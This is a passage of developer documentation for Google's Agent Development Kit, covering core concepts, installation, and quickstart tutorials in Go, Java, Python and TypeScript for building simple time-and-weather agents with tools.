# Agent Development Kit > Build powerful multi-agent systems with Agent Development Kit An open-source, code-first toolkit for building, evaluating, and deploying sophisticated AI agents with flexibility and control. # Build Agents # Get started Agent Development Kit (ADK) is designed to empower developers to quickly build, manage, evaluate and deploy AI-powered agents. These quick start guides get you set up and running a simple agent in less than 20 minutes. - **Python Quickstart** ______________________________________________________________________ Create your first Python ADK agent in minutes. [Start with Python](https://google.github.io/adk-docs/get-started/python/index.md) - **Go Quickstart** ______________________________________________________________________ Create your first Go ADK agent in minutes. [Start with Go](https://google.github.io/adk-docs/get-started/go/index.md) - **Java Quickstart** ______________________________________________________________________ Create your first Java ADK agent in minutes. [Start with Java](https://google.github.io/adk-docs/get-started/java/index.md) - **TypeScript Quickstart** ______________________________________________________________________ Create your first TypeScript ADK agent in minutes. [Start with TypeScript](https://google.github.io/adk-docs/get-started/typescript/index.md) # Agent Development Kit (ADK) **Build, Evaluate and Deploy agents, seamlessly!** ADK is designed to empower developers to build, manage, evaluate and deploy AI-powered agents. It provides a robust and flexible environment for creating both conversational and non-conversational agents, capable of handling complex tasks and workflows. ## Core Concepts ADK is built around a few key primitives and concepts that make it powerful and flexible. Here are the essentials: - **Agent:** The fundamental worker unit designed for specific tasks. Agents can use language models (`LlmAgent`) for complex reasoning, or act as deterministic controllers of the execution, which are called "[workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md)" (`SequentialAgent`, `ParallelAgent`, `LoopAgent`). - **Tool:** Gives agents abilities beyond conversation, letting them interact with external APIs, search information, run code, or call other services. - **Callbacks:** Custom code snippets you provide to run at specific points in the agent's process, allowing for checks, logging, or behavior modifications. - **Session Management (`Session` & `State`):** Handles the context of a single conversation (`Session`), including its history (`Events`) and the agent's working memory for that conversation (`State`). - **Memory:** Enables agents to recall information about a user across *multiple* sessions, providing long-term context (distinct from short-term session `State`). - **Artifact Management (`Artifact`):** Allows agents to save, load, and manage files or binary data (like images, PDFs) associated with a session or user. - **Code Execution:** The ability for agents (usually via Tools) to generate and execute code to perform complex calculations or actions. - **Planning:** An advanced capability where agents can break down complex goals into smaller steps and plan how to achieve them like a ReAct planner. - **Models:** The underlying LLM that powers `LlmAgent`s, enabling their reasoning and language understanding abilities. - **Event:** The basic unit of communication representing things that happen during a session (user message, agent reply, tool use), forming the conversation history. - **Runner:** The engine that manages the execution flow, orchestrates agent interactions based on Events, and coordinates with backend services. ***Note:** Features like Multimodal Streaming, Evaluation, Deployment, Debugging, and Trace are also part of the broader ADK ecosystem, supporting real-time interaction and the development lifecycle.* ## Key Capabilities ADK offers several key advantages for developers building agentic applications: 1. **Multi-Agent System Design:** Easily build applications composed of multiple, specialized agents arranged hierarchically. Agents can coordinate complex tasks, delegate sub-tasks using LLM-driven transfer or explicit `AgentTool` invocation, enabling modular and scalable solutions. 1. **Rich Tool Ecosystem:** Equip agents with diverse capabilities. ADK supports integrating custom functions (`FunctionTool`), using other agents as tools (`AgentTool`), leveraging built-in functionalities like code execution, and interacting with external data sources and APIs (e.g., Search, Databases). Support for long-running tools allows handling asynchronous operations effectively. 1. **Flexible Orchestration:** Define complex agent workflows using built-in workflow agents (`SequentialAgent`, `ParallelAgent`, `LoopAgent`) alongside LLM-driven dynamic routing. This allows for both predictable pipelines and adaptive agent behavior. 1. **Integrated Developer Tooling:** Develop and iterate locally with ease. ADK includes tools like a command-line interface (CLI) and a Developer UI for running agents, inspecting execution steps (events, state changes), debugging interactions, and visualizing agent definitions. 1. **Native Streaming Support:** Build real-time, interactive experiences with native support for bidirectional streaming (text and audio). This integrates seamlessly with underlying capabilities like the [Multimodal Live API for the Gemini Developer API](https://ai.google.dev/gemini-api/docs/live) (or for [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/multimodal-live)), often enabled with simple configuration changes. 1. **Built-in Agent Evaluation:** Assess agent performance systematically. The framework includes tools to create multi-turn evaluation datasets and run evaluations locally (via CLI or the dev UI) to measure quality and guide improvements. 1. **Broad LLM Support:** While optimized for Google's Gemini models, the framework is designed for flexibility, allowing integration with various LLMs (potentially including open-source or fine-tuned models) through its `BaseLlm` interface. 1. **Artifact Management:** Enable agents to handle files and binary data. The framework provides mechanisms (`ArtifactService`, context methods) for agents to save, load, and manage versioned artifacts like images, documents, or generated reports during their execution. 1. **Extensibility and Interoperability:** ADK promotes an open ecosystem. While providing core tools, it allows developers to easily integrate and reuse third-party tools and data connectors. 1. **State and Memory Management:** Automatically handles short-term conversational memory (`State` within a `Session`) managed by the `SessionService`. Provides integration points for longer-term `Memory` services, allowing agents to recall user information across multiple sessions. ## Get Started - Ready to build your first agent? [Try the quickstart](https://google.github.io/adk-docs/get-started/quickstart/index.md) # Go Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for Go. Before you start, make sure you have the following installed: - Go 1.24.4 or later - ADK Go v0.2.0 or later ## Create an agent project Create an agent project with the following files and directory structure: ```text my_agent/ agent.go # main agent code .env # API keys or project IDs ``` Create this project structure using the command line ```console mkdir my_agent\ type nul > my_agent\agent.go type nul > my_agent\env.bat ``` ```bash mkdir -p my_agent/ && \ touch my_agent/agent.go && \ touch my_agent/.env ``` ### Define the agent code Create the code for a basic agent that uses the built-in [Google Search tool](/adk-docs/tools/built-in-tools/#google-search). Add the following code to the `my_agent/agent.go` file in your project directory: my_agent/agent.go ```go package main import ( "context" "log" "os" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/cmd/launcher" "google.golang.org/adk/cmd/launcher/full" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/geminitool" "google.golang.org/genai" ) func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-3-pro-preview", &genai.ClientConfig{ APIKey: os.Getenv("GOOGLE_API_KEY"), }) if err != nil { log.Fatalf("Failed to create model: %v", err) } timeAgent, err := llmagent.New(llmagent.Config{ Name: "hello_time_agent", Model: model, Description: "Tells the current time in a specified city.", Instruction: "You are a helpful assistant that tells the current time in a city.", Tools: []tool.Tool{ geminitool.GoogleSearch{}, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(timeAgent), } l := full.NewLauncher() if err = l.Execute(ctx, config, os.Args[1:]); err != nil { log.Fatalf("Run failed: %v\n\n%s", err, l.CommandLineSyntax()) } } ``` ### Configure project and dependencies Use the `go mod` command to initialize the project modules and install the required packages based on the `import` statement in your agent code file: ```console go mod init my-agent/main go mod tidy ``` ### Set your API key This project uses the Gemini API, which requires an API key. If you don't already have Gemini API key, create a key in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page. In a terminal window, write your API key into the `.env` or `env.bat` file of your project to set environment variables: Update: my_agent/.env ```bash echo 'export GOOGLE_API_KEY="YOUR_API_KEY"' > .env ``` Update: my_agent/env.bat ```console echo 'set GOOGLE_API_KEY="YOUR_API_KEY"' > env.bat ``` Using other AI models with ADK ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models). ## Run your agent You can run your ADK agent using the interactive command-line interface you defined or the ADK web user interface provided by the ADK Go command line tool. Both these options allow you to test and interact with your agent. ### Run with command-line interface Run your agent using the following Go command: Run from: my_agent/ directory ```console # Remember to load keys and settings: source .env OR env.bat go run agent.go ``` ### Run with web interface Run your agent with the ADK web interface using the following Go command: Run from: my_agent/ directory ```console # Remember to load keys and settings: source .env OR env.bat go run agent.go web api webui ``` This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8080). Select your agent at the upper left corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Installing ADK ## Create & activate virtual environment We recommend creating a virtual Python environment using [venv](https://docs.python.org/3/library/venv.html): ```shell python -m venv .venv ``` Now, you can activate the virtual environment using the appropriate command for your operating system and environment: ```text # Mac / Linux source .venv/bin/activate # Windows CMD: .venv\Scripts\activate.bat # Windows PowerShell: .venv\Scripts\Activate.ps1 ``` ### Install ADK ```bash pip install google-adk ``` (Optional) Verify your installation: ```bash pip show google-adk ``` ### Install ADK and ADK DevTools ```bash npm install @google/adk @google/adk-devtools ``` ## Create a new Go module If you are starting a new project, you can create a new Go module: ```shell go mod init example.com/my-agent ``` ## Install ADK To add the ADK to your project, run the following command: ```shell go get google.golang.org/adk ``` This will add the ADK as a dependency to your `go.mod` file. (Optional) Verify your installation by checking your `go.mod` file for the `google.golang.org/adk` entry. You can either use maven or gradle to add the `google-adk` and `google-adk-dev` package. `google-adk` is the core Java ADK library. Java ADK also comes with a pluggable example SpringBoot server to run your agents seamlessly. This optional package is present as part of `google-adk-dev`. If you are using maven, add the following to your `pom.xml`: pom.xml ```xml 4.0.0 com.example.agent adk-agents 1.0-SNAPSHOT 17 17 UTF-8 com.google.adk google-adk 0.5.0 com.google.adk google-adk-dev 0.5.0 ``` Here's a [complete pom.xml](https://github.com/google/adk-docs/tree/main/examples/java/cloud-run/pom.xml) file for reference. If you are using gradle, add the dependency to your build.gradle: build.gradle ```text dependencies { implementation 'com.google.adk:google-adk:0.5.0' implementation 'com.google.adk:google-adk-dev:0.5.0' } ``` You should also configure Gradle to pass `-parameters` to `javac`. (Alternatively, use `@Schema(name = "...")`). ## Next steps - Try creating your first agent with the [**Quickstart**](https://google.github.io/adk-docs/get-started/quickstart/index.md) # Java Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for Java. Before you start, make sure you have the following installed: - Java 17 or later - Maven 3.9 or later ## Create an agent project Create an agent project with the following files and directory structure: ```text my_agent/ src/main/java/com/example/agent/ HelloTimeAgent.java # main agent code AgentCliRunner.java # command-line interface pom.xml # project configuration .env # API keys or project IDs ``` Create this project structure using the command line ```console mkdir my_agent\src\main\java\com\example\agent type nul > my_agent\src\main\java\com\example\agent\HelloTimeAgent.java type nul > my_agent\src\main\java\com\example\agent\AgentCliRunner.java type nul > my_agent\pom.xml type nul > my_agent\.env ``` ```bash mkdir -p my_agent/src/main/java/com/example/agent && \ touch my_agent/src/main/java/com/example/agent/HelloTimeAgent.java && \ touch my_agent/src/main/java/com/example/agent/AgentCliRunner.java && \ touch my_agent/pom.xml my_agent/.env ``` ### Define the agent code Create the code for a basic agent, including a simple implementation of an ADK [Function Tool](/adk-docs/tools-custom/function-tools/), called `getCurrentTime()`. Add the following code to the `HelloTimeAgent.java` file in your project directory: my_agent/src/main/java/com/example/agent/HelloTimeAgent.java ```java package com.example.agent; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import java.util.Map; public class HelloTimeAgent { public static BaseAgent ROOT_AGENT = initAgent(); private static BaseAgent initAgent() { return LlmAgent.builder() .name("hello-time-agent") .description("Tells the current time in a specified city") .instruction(""" You are a helpful assistant that tells the current time in a city. Use the 'getCurrentTime' tool for this purpose. """) .model("gemini-2.5-flash") .tools(FunctionTool.create(HelloTimeAgent.class, "getCurrentTime")) .build(); } /** Mock tool implementation */ @Schema(description = "Get the current time for a given city") public static Map getCurrentTime( @Schema(name = "city", description = "Name of the city to get the time for") String city) { return Map.of( "city", city, "forecast", "The time is 10:30am." ); } } ``` Caution: Gemini 3 compatibility ADK Java v0.3.0 and lower is not compatible with [Gemini 3 Pro Preview](https://ai.google.dev/gemini-api/docs/models#gemini-3-pro) due to thought signature changes for function calling. Use Gemini 2.5 or lower models instead. ### Configure project and dependencies An ADK agent project requires this dependency in your `pom.xml` project file: my_agent/pom.xml (partial) ```xml com.google.adk google-adk 0.5.0 ``` Update the `pom.xml` project file to include this dependency and additional settings with the following configuration code: Complete `pom.xml` configuration for project The following code shows a complete `pom.xml` configuration for this project: my_agent/pom.xml ```xml 4.0.0 com.example.agent adk-agents 1.0-SNAPSHOT 17 17 UTF-8 com.google.adk google-adk 0.3.0 com.google.adk google-adk-dev 0.3.0 ``` ### Set your API key This project uses the Gemini API, which requires an API key. If you don't already have Gemini API key, create a key in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page. In a terminal window, write your API key into your `.env` file of your project to set environment variables: Update: my_agent/.env ```bash echo 'export GOOGLE_API_KEY="YOUR_API_KEY"' > .env ``` Update: my_agent/env.bat ```console echo 'set GOOGLE_API_KEY="YOUR_API_KEY"' > env.bat ``` Using other AI models with ADK ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models). ### Create an agent command-line interface Create a `AgentCliRunner.java` class to allow you to run and interact with `HelloTimeAgent` from the command line. This code shows how to create a `RunConfig` object to run the agent and a `Session` object to interact with the running agent. my_agent/src/main/java/com/example/agent/AgentCliRunner.java ```java package com.example.agent; import com.google.adk.agents.RunConfig; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.Scanner; import static java.nio.charset.StandardCharsets.UTF_8; public class AgentCliRunner { public static void main(String[] args) { RunConfig runConfig = RunConfig.builder().build(); InMemoryRunner runner = new InMemoryRunner(HelloTimeAgent.ROOT_AGENT); Session session = runner .sessionService() .createSession(runner.appName(), "user1234") .blockingGet(); try (Scanner scanner = new Scanner(System.in, UTF_8)) { while (true) { System.out.print("\nYou > "); String userInput = scanner.nextLine(); if ("quit".equalsIgnoreCase(userInput)) { break; } Content userMsg = Content.fromParts(Part.fromText(userInput)); Flowable events = runner.runAsync(session.userId(), session.id(), userMsg, runConfig); System.out.print("\nAgent > "); events.blockingForEach(event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } } } ``` ## Run your agent You can run your ADK agent using the interactive command-line interface `AgentCliRunner` class you defined or the ADK web user interface provided by the ADK using the `AdkWebServer` class. Both these options allow you to test and interact with your agent. ### Run with command-line interface Run your agent with the command-line interface `AgentCliRunner` class using the following Maven command: ```console # Remember to load keys and settings: source .env OR env.bat mvn compile exec:java -Dexec.mainClass="com.example.agent.AgentCliRunner" ``` ### Run with web interface Run your agent with the ADK web interface using the following Maven command: ```console # Remember to load keys and settings: source .env OR env.bat mvn compile exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=target --server.port=8000" ``` This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8000). Select your agent at the upper left corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Python Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit (ADK) for Python. Before you start, make sure you have the following installed: - Python 3.10 or later - `pip` for installing packages ## Installation Install ADK by running the following command: ```shell pip install google-adk ``` Recommended: create and activate a Python virtual environment Create a Python virtual environment: ```shell python -m venv .venv ``` Activate the Python virtual environment: ```console .venv\Scripts\activate.bat ``` ```console .venv\Scripts\Activate.ps1 ``` ```bash source .venv/bin/activate ``` ## Create an agent project Run the `adk create` command to start a new agent project. ```shell adk create my_agent ``` ### Explore the agent project The created agent project has the following structure, with the `agent.py` file containing the main control code for the agent. ```text my_agent/ agent.py # main agent code .env # API keys or project IDs __init__.py ``` ## Update your agent project The `agent.py` file contains a `root_agent` definition which is the only required element of an ADK agent. You can also define tools for the agent to use. Update the generated `agent.py` code to include a `get_current_time` tool for use by the agent, as shown in the following code: ```python from google.adk.agents.llm_agent import Agent # Mock tool implementation def get_current_time(city: str) -> dict: """Returns the current time in a specified city.""" return {"status": "success", "city": city, "time": "10:30 AM"} root_agent = Agent( model='gemini-3-flash-preview', name='root_agent', description="Tells the current time in a specified city.", instruction="You are a helpful assistant that tells the current time in cities. Use the 'get_current_time' tool for this purpose.", tools=[get_current_time], ) ``` ### Set your API key This project uses the Gemini API, which requires an API key. If you don't already have Gemini API key, create a key in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page. In a terminal window, write your API key into an `.env` file as an environment variable: Update: my_agent/.env ```console echo 'GOOGLE_API_KEY="YOUR_API_KEY"' > .env ``` Using other AI models with ADK ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models). ## Run your agent You can run your ADK agent with an interactive command-line interface using the `adk run` command or the ADK web user interface provided by the ADK using the `adk web` command. Both these options allow you to test and interact with your agent. ### Run with command-line interface Run your agent using the `adk run` command-line tool. ```console adk run my_agent ``` ### Run with web interface The ADK framework provides web interface you can use to test and interact with your agent. You can start the web interface using the following command: ```console adk web --port 8000 ``` Note Run this command from the **parent directory** that contains your `my_agent/` folder. For example, if your agent is inside `agents/my_agent/`, run `adk web` from the `agents/` directory. This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8000). Select the agent at the upper left corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Build a multi-tool agent This quickstart guides you through installing the Agent Development Kit (ADK), setting up a basic agent with multiple tools, and running it locally either in the terminal or in the interactive, browser-based dev UI. This quickstart assumes a local IDE (VS Code, PyCharm, IntelliJ IDEA, etc.) with Python 3.10+ or Java 17+ and terminal access. This method runs the application entirely on your machine and is recommended for internal development. ## 1. Set up Environment & Install ADK Create & Activate Virtual Environment (Recommended): ```bash # Create python -m venv .venv # Activate (each new terminal) # macOS/Linux: source .venv/bin/activate # Windows CMD: .venv\Scripts\activate.bat # Windows PowerShell: .venv\Scripts\Activate.ps1 ``` Install ADK: ```bash pip install google-adk ``` Create a new project directory, initialize it, and install dependencies: ```bash mkdir my-adk-agent cd my-adk-agent npm init -y npm install @google/adk @google/adk-devtools npm install -D typescript ``` Create a `tsconfig.json` file with the following content. This configuration ensures your project correctly handles modern Node.js modules. tsconfig.json ```json { "compilerOptions": { "target": "es2020", "module": "nodenext", "moduleResolution": "nodenext", "esModuleInterop": true, "strict": true, "skipLibCheck": true, // set to false to allow CommonJS module syntax: "verbatimModuleSyntax": false } } ``` To install ADK and setup the environment, proceed to the following steps. ## 2. Create Agent Project ### Project structure You will need to create the following project structure: ```console parent_folder/ multi_tool_agent/ __init__.py agent.py .env ``` Create the folder `multi_tool_agent`: ```bash mkdir multi_tool_agent/ ``` Note for Windows users When using ADK on Windows for the next few steps, we recommend creating Python files using File Explorer or an IDE because the following commands (`mkdir`, `echo`) typically generate files with null bytes and/or incorrect encoding. ### `__init__.py` Now create an `__init__.py` file in the folder: ```shell echo "from . import agent" > multi_tool_agent/__init__.py ``` Your `__init__.py` should now look like this: multi_tool_agent/__init__.py ```python from . import agent ``` ### `agent.py` Create an `agent.py` file in the same folder: ```shell touch multi_tool_agent/agent.py ``` ```shell type nul > multi_tool_agent/agent.py ``` Copy and paste the following code into `agent.py`: multi_tool_agent/agent.py ```python import datetime from zoneinfo import ZoneInfo from google.adk.agents import Agent def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } def get_current_time(city: str) -> dict: """Returns the current time in a specified city. Args: city (str): The name of the city for which to retrieve the current time. Returns: dict: status and result or error msg. """ if city.lower() == "new york": tz_identifier = "America/New_York" else: return { "status": "error", "error_message": ( f"Sorry, I don't have timezone information for {city}." ), } tz = ZoneInfo(tz_identifier) now = datetime.datetime.now(tz) report = ( f'The current time in {city} is {now.strftime("%Y-%m-%d %H:%M:%S %Z%z")}' ) return {"status": "success", "report": report} root_agent = Agent( name="weather_time_agent", model="gemini-2.0-flash", description=( "Agent to answer questions about the time and weather in a city." ), instruction=( "You are a helpful agent who can answer user questions about the time and weather in a city." ), tools=[get_weather, get_current_time], ) ``` ### `.env` Create a `.env` file in the same folder: ```shell touch multi_tool_agent/.env ``` ```shell type nul > multi_tool_agent\.env ``` More instructions about this file are described in the next section on [Set up the model](#set-up-the-model). You will need to create the following project structure in your `my-adk-agent` directory: ```console my-adk-agent/ agent.ts .env package.json tsconfig.json ``` ### `agent.ts` Create an `agent.ts` file in your project folder: ```shell touch agent.ts ``` ```shell type nul > agent.ts ``` Copy and paste the following code into `agent.ts`: agent.ts ```typescript import 'dotenv/config'; import { FunctionTool, LlmAgent } from '@google/adk'; import { z } from 'zod'; const getWeather = new FunctionTool({ name: 'get_weather', description: 'Retrieves the current weather report for a specified city.', parameters: z.object({ city: z.string().describe('The name of the city for which to retrieve the weather report.'), }), execute: ({ city }) => { if (city.toLowerCase() === 'new york') { return { status: 'success', report: 'The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees Fahrenheit).', }; } else { return { status: 'error', error_message: `Weather information for '${city}' is not available.`, }; } }, }); const getCurrentTime = new FunctionTool({ name: 'get_current_time', description: 'Returns the current time in a specified city.', parameters: z.object({ city: z.string().describe("The name of the city for which to retrieve the current time."), }), execute: ({ city }) => { let tz_identifier: string; if (city.toLowerCase() === 'new york') { tz_identifier = 'America/New_York'; } else { return { status: 'error', error_message: `Sorry, I don't have timezone information for ${city}.`, }; } const now = new Date(); const report = `The current time in ${city} is ${now.toLocaleString('en-US', { timeZone: tz_identifier })}`; return { status: 'success', report: report }; }, }); export const rootAgent = new LlmAgent({ name: 'weather_time_agent', model: 'gemini-2.5-flash', description: 'Agent to answer questions about the time and weather in a city.', instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.', tools: [getWeather, getCurrentTime], }); ``` ### `.env` Create a `.env` file in the same folder: ```shell touch .env ``` ```shell type nul > .env ``` More instructions about this file are described in the next section on [Set up the model](#set-up-the-model). Java projects generally feature the following project structure: ```console project_folder/ ├── pom.xml (or build.gradle) ├── src/ ├── └── main/ │ └── java/ │ └── agents/ │ └── multitool/ └── test/ ``` ### Create `MultiToolAgent.java` Create a `MultiToolAgent.java` source file in the `agents.multitool` package in the `src/main/java/agents/multitool/` directory. Copy and paste the following code into `MultiToolAgent.java`: agents/multitool/MultiToolAgent.java ```java package agents.multitool; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.nio.charset.StandardCharsets; import java.text.Normalizer; import java.time.ZoneId; import java.time.ZonedDateTime; import java.time.format.DateTimeFormatter; import java.util.Map; import java.util.Scanner; public class MultiToolAgent { private static String USER_ID = "student"; private static String NAME = "multi_tool_agent"; // The run your agent with Dev UI, the ROOT_AGENT should be a global public static final variable. public static final BaseAgent ROOT_AGENT = initAgent(); public static BaseAgent initAgent() { return LlmAgent.builder() .name(NAME) .model("gemini-2.0-flash") .description("Agent to answer questions about the time and weather in a city.") .instruction( "You are a helpful agent who can answer user questions about the time and weather" + " in a city.") .tools( FunctionTool.create(MultiToolAgent.class, "getCurrentTime"), FunctionTool.create(MultiToolAgent.class, "getWeather")) .build(); } public static Map getCurrentTime( @Schema(name = "city", description = "The name of the city for which to retrieve the current time") String city) { String normalizedCity = Normalizer.normalize(city, Normalizer.Form.NFD) .trim() .toLowerCase() .replaceAll("(\\p{IsM}+|\\p{IsP}+)", "") .replaceAll("\\s+", "_"); return ZoneId.getAvailableZoneIds().stream() .filter(zid -> zid.toLowerCase().endsWith("/" + normalizedCity)) .findFirst() .map( zid -> Map.of( "status", "success", "report", "The current time in " + city + " is " + ZonedDateTime.now(ZoneId.of(zid)) .format(DateTimeFormatter.ofPattern("HH:mm")) + ".")) .orElse( Map.of( "status", "error", "report", "Sorry, I don't have timezone information for " + city + ".")); } public static Map getWeather( @Schema(name = "city", description = "The name of the city for which to retrieve the weather report") String city) { if (city.toLowerCase().equals("new york")) { return Map.of( "status", "success", "report", "The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees" + " Fahrenheit)."); } else { return Map.of( "status", "error", "report", "Weather information for " + city + " is not available."); } } public static void main(String[] args) throws Exception { InMemoryRunner runner = new InMemoryRunner(ROOT_AGENT); Session session = runner .sessionService() .createSession(NAME, USER_ID) .blockingGet(); try (Scanner scanner = new Scanner(System.in, StandardCharsets.UTF_8)) { while (true) { System.out.print("\nYou > "); String userInput = scanner.nextLine(); if ("quit".equalsIgnoreCase(userInput)) { break; } Content userMsg = Content.fromParts(Part.fromText(userInput)); Flowable events = runner.runAsync(USER_ID, session.id(), userMsg); System.out.print("\nAgent > "); events.blockingForEach(event -> System.out.println(event.stringifyContent())); } } } } ``` ## 3. Set up the model Your agent's ability to understand user requests and generate responses is powered by a Large Language Model (LLM). Your agent needs to make secure calls to this external LLM service, which **requires authentication credentials**. Without valid authentication, the LLM service will deny the agent's requests, and the agent will be unable to function. Model Authentication guide For a detailed guide on authenticating to different models, see the [Authentication guide](/adk-docs/agents/models/google-gemini#google-ai-studio). This is a critical step to ensure your agent can make calls to the LLM service. 1. Get an API key from [Google AI Studio](https://aistudio.google.com/apikey). 1. When using Python, open the **`.env`** file located inside (`multi_tool_agent/`) and copy-paste the following code. multi_tool_agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE ``` When using Java, define environment variables: terminal ```console export GOOGLE_GENAI_USE_VERTEXAI=FALSE export GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE ``` When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file. `env title=""multi_tool_agent/.env" GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_GENAI_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE` 1. Replace `PASTE_YOUR_ACTUAL_API_KEY_HERE` with your actual `API KEY`. 1. Set up a [Google Cloud project](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-gcp) and [enable the Vertex AI API](https://console.cloud.google.com/flows/enableapi?apiid=aiplatform.googleapis.com). 1. Set up the [gcloud CLI](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-local). 1. Authenticate to Google Cloud from the terminal by running `gcloud auth application-default login`. 1. When using Python, open the **`.env`** file located inside (`multi_tool_agent/`). Copy-paste the following code and update the project ID and location. multi_tool_agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID GOOGLE_CLOUD_LOCATION=LOCATION ``` When using Java, define environment variables: terminal ```console export GOOGLE_GENAI_USE_VERTEXAI=TRUE export GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID export GOOGLE_CLOUD_LOCATION=LOCATION ``` When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file. .env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_CLOUD_PROJECT=YOUR_PROJECT_ID GOOGLE_CLOUD_LOCATION=LOCATION ``` 1. You can sign up for a free Google Cloud project and use Gemini for free with an eligible account! - Set up a [Google Cloud project with Vertex AI Express Mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview) - Get an API key from your Express mode project. This key can be used with ADK to use Gemini models for free, as well as access to Agent Engine services. 1. When using Python, open the **`.env`** file located inside (`multi_tool_agent/`). Copy-paste the following code and update the project ID and location. multi_tool_agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` When using Java, define environment variables: terminal ```console export GOOGLE_GENAI_USE_VERTEXAI=TRUE export GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` When using TypeScript, the `.env` file is automatically loaded by the `import 'dotenv/config';` line at the top of your `agent.ts` file. .env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_GENAI_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` ## 4. Run Your Agent Using the terminal, navigate to the parent directory of your agent project (e.g. using `cd ..`): ```console parent_folder/ <-- navigate to this directory multi_tool_agent/ __init__.py agent.py .env ``` There are multiple ways to interact with your agent: Authentication Setup for Vertex AI Users If you selected **"Gemini - Google Cloud Vertex AI"** in the previous step, you must authenticate with Google Cloud before launching the dev UI. Run this command and follow the prompts: ```bash gcloud auth application-default login ``` **Note:** Skip this step if you're using "Gemini - Google AI Studio". Run the following command to launch the **dev UI**. ```shell adk web ``` Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. Note for Windows users When hitting the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead. **Step 1:** Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) directly in your browser. **Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "multi_tool_agent". Troubleshooting If you do not see "multi_tool_agent" in the dropdown menu, make sure you are running `adk web` in the **parent folder** of your agent folder (i.e. the parent folder of multi_tool_agent). **Step 3.** Now you can chat with your agent using the textbox: **Step 4.** By using the `Events` tab at the left, you can inspect individual function calls, responses and model responses by clicking on the actions: On the `Events` tab, you can also click the `Trace` button to see the trace logs for each event that shows the latency of each function calls: **Step 5.** You can also enable 